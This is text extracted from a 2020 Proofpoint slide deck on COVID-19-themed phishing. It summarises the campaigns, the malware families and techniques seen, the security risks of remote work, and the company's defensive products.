![Page 1: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/1.jpg)
Phishing During a Pandemic: Actors, Campaigns & Threats Leveraging COVID-19 Lures20 May 2020
![Page 2: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/2.jpg)
© 2019 Proofpoint. All rights reserved
Global Campaigns By Campaign Family
![Page 3: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/3.jpg)
Global COVID-Themed Campaigns By Campaign Family
3© 2019 Proofpoint. All rights reserved
![Page 4: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/4.jpg)
All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse
Global vs COVID Brand Abuse Trends
© 2019 Proofpoint. All rights reserved 4
![Page 5: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/5.jpg)
5© 2019 Proofpoint. All rights reserved
Silent Librarian
Modest
Veers
Covid-19 Map
Covid-19 Fake Bill
Covid WHO Lure
LURES ACTORS
![Page 6: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/6.jpg)
6© 2019 Proofpoint. All rights reserved
![Page 7: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/7.jpg)
7© 2019 Proofpoint. All rights reserved
![Page 8: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/8.jpg)
• High risk home network• Traditional VPN could allow
lateral movement
• Going straight to cloud apps from home office
• Traditional visibility limited• Possibly personal device with
uncertain security posture
• Targeted by phishing and BEC (likely leveraging COVID-19 lures)
• Low level of awareness for secure remote working
• No longer on corporate network
• Higher risk for downloaders pulling down secondary payloads
Key Changes to Secure Posture for Remote Work
8
![Page 9: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/9.jpg)
Protecting transitions to remote workPeople-Centric Secure Remote Access
9
Insider Threat Management for increased visibility into what remote workers do with sensitive data
ZTNA for rapid, zero trust implementation of secure remote access to on prem systems and data without any hardware
Email protection for protection from threats, awareness training for secure remote work practices
Isolation to provide secure web browsing and BYOD access to SaaS applications
CASB for visibility, RBA, threat protection, and DLP across cloud apps
![Page 10: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/10.jpg)
10
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
![Page 11: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/11.jpg)
11© 2020 Proofpoint. All rights reserved | Proofpoint, Inc. - Confidential and Proprietary
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
office[.]com docs[.]google[.]com windows[.]net sharepoint[.]com
Domains with Most Threats Detected
![Page 12: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/12.jpg)
12
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
CVE-2017-8570 + OLE
SquibblyDoo(regsvr32.exe)
Lemon Tree (PoSH)
![Page 13: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/13.jpg)
© 2020 Proofpoint. All rights reserved | Proofpoint, Inc. - Confidential and Proprietary
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
![Page 14: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/14.jpg)
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
Malicious Third-Party Apps
![Page 15: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/15.jpg)
COVID-19By the Numbers
© 2019 Proofpoint. All rights reserved
![Page 16: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/16.jpg)
75 Million
COVID-19 Volume
© 2019 Proofpoint. All rights reserved 16
330+
Campaigns Tracked
malicious messages
(April 18-22)
![Page 17: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/17.jpg)
Actors are motivated and integrating different themes spanning global to personal
Campaign themes
© 2019 Proofpoint. All rights reserved 17
Intrinsic
Mixed
Extrinsic
LocalRegional
Global
Tactical Operational Strategic
Widespread Mixed Focused
Prim
ary
Mot
ivat
ions
Delivery
Themes
Survival kits, Medical Supplies, cases near
me
Shipping, manufacturing
Retail, Banking
Tax reduction
Transnational… anti-bacteria credit card
Netherlands
Secondary Motivations
BEC
Markets, World Health
Organization
China, Italy, Netherlands,
Germany, United States,
Japan, Australia
Personal
![Page 18: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/18.jpg)
Tactics Leveraging Coronavirus Malware Payloads
• Emotet• AZORult Stealer• AgentTesla Keylogger• GuLoader / NanoCore RAT• Microsoft Office Phish• HawkEye Keylogger• Betabot• Ave Maria / GuLoader / Remcos• Ave Maria / Remcos / LimeRAT• LimeRAT• Ostap / The Trick
Across the Threats
© 2019 Proofpoint. All rights reserved 18
MALICIOUS ATTACHMENT
MALICIOUS URL
CREDENTIAL PHISHING
BEC AND EMAIL FRAUD
FILE NAMES DOMAIN NAMES
![Page 19: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/19.jpg)
Threat FocusExamples from the Landscape
© 2019 Proofpoint. All rights reserved
![Page 20: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/20.jpg)
Threat Overview
• Summary: Campaign distributing RemcosRAT/downloader with 2 lures (one COVID-19, one harassment)
• Subject: Sexual harassment report / package notification
• Tactics and Tools: .iso image file• Malware: Remcos RAT• Volume: Widespread distribution
© 2020 Proofpoint. All rights reserved 20
Remcos RAT – COVID-19
![Page 21: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/21.jpg)
Threat Overview
• Summary: Campaign spoofing US Department of Labor
• Lure: FMLA adjustments • Technique: IcedID (modular malware)• Volume: broadly targeted
© 2020 Proofpoint. All rights reserved 21
Family and Medical Leave Act
![Page 22: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/22.jpg)
Threat Overview
• Summary: Message purporting to be from World Health with WHO seal
• Subject: “COVID-19 HIGH RISK VSL / URGENT”
• Tactics and Tools: Microsoft Office attachments that use exploits (Equation Editor, CVE-2017-11882, CVE-2017-8570, macros) to download Agent Tesla
• Volumes: 4000~ Messages– 372 Organizations– 44% Transportation– 15% Energy
Agent Tesla port vessel (1/2)
© 2019 Proofpoint. All rights reserved 22
![Page 23: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/23.jpg)
Threat Overview
• Summary: Message purporting to be from World Health with WHO seal
• Subject: “COVID-19 HIGH RISK VSL / URGENT”
• Tactics and Tools: Microsoft Office attachments that use exploits (Equation Editor, CVE-2017-11882, CVE-2017-8570, macros) to download Agent Tesla
• Volumes: 4000~ Messages– 372 Organizations– 44% Transportation– 15% Energy
Agent Tesla port vessel (2/2)
© 2019 Proofpoint. All rights reserved 23
![Page 24: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/24.jpg)
Threat Overview
• Summary: Campaign leveraging Word documents and Squibblydoo technique to launch Powershell script
• Subject: The Truth of COVID-19 ????????????
• Tactics and Tools: Word (RTF) documents used Squibblydoo to launch a PowerShell script. Followed by downloads of Mimikatz and remote desktop utility 'FreeRDP’
• Malware: Mimikatz via Powershell Script Then download of a remote desktop utility FreeRDP
• Targeting: 80 PFPT customers across 36 verticals.
The Truth of COVID-19 (1/1)
© 2019 Proofpoint. All rights reserved 24
![Page 25: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/25.jpg)
• Spoofed offers of relief from financial institutions
• Primarily steals for credit card, direct deposit details, and other forms of financial data
• Most prevalent in the United States; also present in Europe, Australia, and Africa
Emerging Trends
25© 2020 Proofpoint. All rights reserved
![Page 26: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/26.jpg)
Proofpoint and COVID-19Summary, our position, updates, questions
© 2019 Proofpoint. All rights reserved
![Page 27: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/27.jpg)
© 2020 Proofpoint. All rights reserved | Proofpoint, Inc. - Confidential and Proprietary 27
PEOPLE-CENTRIC PROTECTION
DATA AND ACCESSCONTROLS
Advanced Email Security
Cloud Accounts
InternalEmail
Personal Webmail
Endpoint Activity
Web and UnsanctionedApp Access
Sanctioned Access
IdentityDeception
ProtectionTargeted Attack Protection (TAP)
Threat Response Auto-Pull (TRAP)
Internal MailDefense
Cloud Account Defense
EmailIsolation
Email DLP
Email Encryption
CASB DLP
BrowserIsolation
Zero Trust Access
Email FraudDefense
InsiderThreat Management
Cloud App Governance and Data Protection
Information Protection
AWARENESSAND TRAINING
Protect people from the threats that
target them
Enable users to protect themselves and your organization
Protect the data people create and access from
security and compliance risk
![Page 28: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/28.jpg)
Response and Resources
• Detection for commodity remains strong
• TAP Campaigns being tracked as “COVID-19”
• Set of COVID-19 hunting and detection IDS sigs available open source in ET Open
– http://rules.emergingthreatspro.com/open/
• Free Meta VPN solution through September 2020
Continuing Updates
• Updates– Proofpoint blog updates
• https://www.proofpoint.com/us/blog
Response
© 2019 Proofpoint. All rights reserved 28
@threatinsight
![Page 29: Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020 · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse](https://reader034.vdocuments.us/reader034/viewer/2022043000/5f73ad57ac7fb610af595a5b/html5/thumbnails/29.jpg)
Other Resources (All Free)
• Proofpoint Meta available to all Proofpoint customers at no charge for zero trust network access
• Security Awareness Training attack spotlight: Covid-19 lures
• Remote worker-tailored training modules
• Partner offer: MFA and SSO from Okta: https://www.okta.com/okta-for-emergency-remote-work/
29© 2019 Proofpoint. All rights reserved